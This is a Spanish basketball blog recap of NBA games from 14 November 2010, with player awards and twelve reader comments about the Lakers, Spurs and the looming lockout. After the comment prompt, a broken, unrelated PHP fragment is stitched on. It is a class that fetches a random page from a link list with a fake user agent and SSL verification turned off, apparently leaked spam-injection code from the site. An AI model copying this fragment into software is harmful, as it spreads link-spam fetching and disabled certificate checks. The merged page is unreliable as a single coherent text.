La Crónica (14/11/2010)

15 de November de 2010 por TheDeerHunter

Segunda derrota consecutiva de los Lakers (121-116). Todo un equipo campeón impotente ante la madre de todos los bombardeos por parte de los Phoenix Suns. Nada menos que 22 de 40 triples: 7 de 10 de Richardson, 5 de 7 de Turkoglu, 4 de 9 de Frye, 3 de 5 de Dragic, 2 de 3 de Nash (más su habitual quincena de asistencias)… Ni 40 buenísimos minutos por cabeza del “big three” más eficaz de la liga pudieron contrarrestar la sangría. La derrota era inevitable. Quizás si los Lakers no hubieran perdido tantos balones  (Kobe perdió hasta 8 en casi un cuádruple doble). La demostración palmaria de lo que pueden llegar a ser unos Suns que ya firman en positivo.

Para más sangre en L.A., los Spurs les han pasado fuertes por la izquierda y encima lo han logrado también a base de triples (117-104). Matt Bonner les endosó un 7 de 7 a los Thunder en Oklahoma para un total de 11 de 20 que marcó diferencia entre ellos. Y no se puede decir que los locales tengan mala defensa en general y en el perímetro en particular.

Por su parte, los Hawks truncaron su nefasta racha y lo hicieron a costa de los pujantes Wolves con Love y Beasley en estado de gracia (105-111). Horford se arremangó para cuajar su mejor partido del año aunque las diferencias se gestaron por las 21 pérdidas de los lobitos. Suficientes como para que un equipo que habitualmente no anda demasiado sobrado tire un buen partido por la borda.

Por último, los Rockets asaltaron el Madison (104-96) gracias a la dupla Scola-Martin con el bueno de Luis haciendo amigos entre sus compañeros declarando que jugará aunque se produzca el temido lock-out. Además los Pistons arañaron otra victoria en Sacramento (100-94). Llueve algo menos tanto en Houston como en Detroit.

PREMIOS

MVP: Los Suns sacaron a los Lakers del partido a base de triples y en particular Jason Richardson que consiguió 7 de 10 intentos par aun total de 35 puntos. Además aportó 8 rebotes, 3 asistencias y 3 robos.

Rookie: Poco hemos hablado de Landry Fields una de las grandes sorpresas de la temporada que se ha ganado la confianza de D’Antoni y sale como titular en todos los partidos. Sus estadísticas de ayer son las propias de un jugador sobrio y trabajador: 12 puntos (5 de 6) y 6 rebotes.

Sorpresa: En la orgía anotadora de los Suns no podían faltar el “especialista” Channing Frye, con 20 puntos y 4 de 9 en triples, ni Hedo Turkoglu que se fue a los 17 puntos con 5 de 7 en triples. Por su parte Sebastian Telfair sigue jugando de titular ante las bajas de Flynn y Ridnour. Anoche cuajó una buena actuación con 18 puntos, 8 asistencias y 3 robos. Y finalmente, el 7 de 7 en triple que se cascó Matt Bonner frente los Thunder.

Decepción: Con el 1 de 11 en tiros que consiguió Toney Douglas podemos concluir que no ejerció precisamente de microondas en el partido de anoche.

Esfuerzo en vano: No creo que veamos muy a menudo a Pau Gasol y Kobe Bryant por estos páramos pero los 28 puntos y 17 rebotes del primero y los 25 puntos, 9 rebotes y 14 asistencias del segundo son, sin duda, el mayor esfuerzo en vano de la jornada.

Comenta

12 comentarios a esta entrada

  1. LEmontus dice:
    #1

    Creo que la única manera que tenía suns de ganarle a Lal era ametrallando a triples , y se dio la noche con todos los tiradores inspirados.

      Citar

  2. nacho dice:
    #2

    Una petición: un post o comentario sobre el lock-out. Gracias.
    ¿Qué pasa con Duncan? ¿Le sentó mal que Viva no lo pusiera primero? Por cierto esperamos el #1. En casa dudamos entre Kobe y Vujacic.

      Citar

  3. Txusma dice:
    #3

    El #1 saldrá hoy o mañana y recogemos el guante del artículo del lockout.

      Citar

  4. Txusma dice:
    #4

    De todas maneras te informo que ya publicamos un artículo sobre el tema en febrero aunque es bien cierto que a lo mejor haría falta una revisión.
    Puedes ver el artículo en http://blog.tjnba.com/2010/02/08/convenio-colectivo-de-la-nba-%c2%bfhuelga-en-el-horizonte/

      Citar

  5. TheDeerHunter dice:
    #5

    He cometido un error esta mañana con la información de Scola.
    Él no se ha mostrado en contra de la postura de sus compañeros (ya me estrañaba, por cierto) sino que ha asegurado que eso no afectara a su participación con la selección.
    Confusión mía, sorry.

      Citar

  6. GreenPride dice:
    #6

    Esta noche los Spurs dieron una lección a los jóvenes Thunder. Tras dos primeros cuartos de dominio Thunder, salieron totalmente empanados al tercero y poco a poco los Spurs le comieron la tostada con un gran Manudona y Bonner haciendo ese 7-7 triples. Por los Thunder poco movimiento de balón en la segunda parte lo que dió lugar a malos tiros de Durant, Westbrook y demás. Gran partido de Ibaka que va a ser un gran jugador

      Citar

  7. Denise dice:
    #7

    Realmente, no considero preocupante las dos derrotas de Lakers. Vs Nuggets dominaron durante los 3 primeros cuartos, y, a pesar del mal último cuarto y a que kObe se empeñó en tirarse hasta las zapatillas, tuvieron opciones hasta el ultimo momento. Y hoy, ante los Suns con un acierto increible en el triple que dudo que lo tengan en otro partido, sólo han perdido de 5; lo que demuestra el poderío ofensivo de estos Lakers, a los cuales, para ganarles tienes que estar perfecto en ataque y tocado por una varita mágica, para endosarle más de 115 puntos, y aún así sufres hasta el último minuto para ganar.
    Conclusión: Los Lakers se van a pasear por el Oeste.

      Citar

  8. sergio dice:
    #8

    Quizás el MVP del dia tenga q estar compartido con Horford. Creo que hasta tuvo una mayor valoración mirando las estadísticas por encima.

    Me gustó bastante Tony Parker ayer. Sólo él y Nash son capaces de botar y penetrar de esa manera entre tantos hombres altos en la pintura. Lo de los Spurs es para analizarlo en profundidad… aun más visto el nivel de Duncan, que trabaja en función de lo que lo necesita su equipo (ultimamente poco). Y encima parece que Jefferson se está poniendo un poquito mas las pilas. Al que si veo algo estancado es a DeJuan Blair… espero equivocarme

    Las dos derrotas de los Lakers no me preocupan en absoluto. Los equipos contra los que tienen que estar concentrados son otros. Perder un partido contra un equipo de Finales de Conferencia (porque echa mas de menos Stoudamire a los de Arizona que viceversa) que tiene su día es algo que siempre puede pasar.

      Citar

  9. nacho dice:
    #9

    Gracias Txus.
    Hablando de los Lakers, yo tampoco me preocuparía, pero son dos derrots seguidas jugando más o menos bien. En PO les vimos ganar jugando más mal que bien. No sé,a mí jugar bien y perder, siendo los mejores algo me escamaría… No todos los días te van a meter 22 triples con más del 50% pero…

      Citar

  10. Cocinitas dice:
    #10

    Me parece q este año los Lakers tienen una de las mejores plantillas que recuerdo en NBA, me esta gustando muxo la aportación del banquillo, muy bien Barnes y Brown, pero me preocupa en estos momentos una lesión auqnue sea leve de Odom o Gasol ya que quedaria muy tocado el juego interior de estos lakers. No creo tambien q sea buena idea hacer jugar muxos partidos a Gasol de mas de 40 minutos ya que puede llegar muy tocado a los playoffs. Aún asi los veo muy favoritos en el oeste creo q nadie les hara sombra si tienen suerte con las lesiones.

      Citar

  11. Denise dice:
    #11

    Totalmente de acuerdo con cocinitas.
    Creo que Phil se equivoca en cargar de minutos a Pau, en cambio, Ratliff juega menos que Mbenga y Character que Powell. Por sacar 7 minutillos a cada uno y darle a Pau 14 minutos de descanso tampoco creo que por ello vayan a encajar un parcial de 20-0. y si lo encajan, no pasa nada, anda que no hay partidos en temporada Regular.
    La filosofia NBA de que titulares juegan vs titulares y suplentes vs suplentes cada día la entiendo menos.
    No es mejor para rotar y dar descanso a hombres importantes sin que el rendimiento del equipo se vea alterado, el mezclar en varias fases de partido los titulares con los suplentes. en fin, ellos sabrán…

      Citar

  12. Sempren dice:
    #12

    Soy el primero al que no le gusta que Pau se cargue de minutos ahora (ni Pau, ni Odom, ni el Big Three céltico…), pero bueno, tampoco estoy de acuerdo con que eso le haga llegar tocado a PO, más que nada porque ya el año pasado era el que más jugaba en Lakers, por encima de Kobe, y en post-temporada estuvo bien.
    Sí, va cumpliendo años, pero creo que puede aguantarlo. Otra cosa es que evidentemente, no es lo mejor para él, y como dice Denise, sería conveniente que jugara algo menos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>